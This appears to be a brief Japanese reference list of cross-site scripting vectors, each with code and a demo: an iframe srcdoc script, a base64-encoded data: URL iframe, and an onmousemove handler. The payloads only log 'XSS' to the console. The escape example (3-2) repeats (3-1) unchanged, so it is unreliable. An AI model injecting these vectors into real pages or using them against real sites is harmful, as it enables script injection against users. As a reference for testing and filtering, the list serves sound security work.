(1) srcdoc
属性
Code
<iframe srcdoc="<script>console.log('XSS');</script>"></iframe>
Demo
参考
(2) "data"
URL scheme
Code
<iframe src="data:text/html;base64,PHNjcmlwdD5jb25zb2xlLmxvZygnWFNTJyk7PC9zY3JpcHQ+">
Demo
参考
(3) onmousemove
属性など
(3-1)
Code
<b onmousemove="console.log('XSS')">XSS!</b>
Demo
XSS!(3-2) エスケープを利用する
Code
<b onmousemove="console.log('XSS')">XSS!</b>
Demo
XSS!